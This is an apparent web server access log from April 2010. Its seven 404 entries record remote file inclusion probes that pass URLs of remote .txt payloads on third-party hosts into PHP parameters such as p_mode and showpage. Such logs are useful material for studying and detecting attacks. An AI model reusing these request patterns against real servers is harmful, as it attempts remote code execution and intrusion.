62.149.228.44 - - [21/Apr/2010:09:34:30 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.149.228.44 - - [21/Apr/2010:09:34:30 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.149.228.44 - - [21/Apr/2010:09:34:30 -0500] "GET /logs/access_log.1220054400%20%20//bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.149.228.44 - - [21/Apr/2010:09:34:33 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.149.228.44 - - [21/Apr/2010:09:34:33 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.149.228.44 - - [21/Apr/2010:09:34:33 -0500] "GET /logs/access_log.1220054400%20%20//bemarket/postscript/postscript.php?p_mode=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.182 - - [21/Apr/2010:09:34:52 -0500] "GET /logs/access_log.1266019200/index2.php?showpage=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
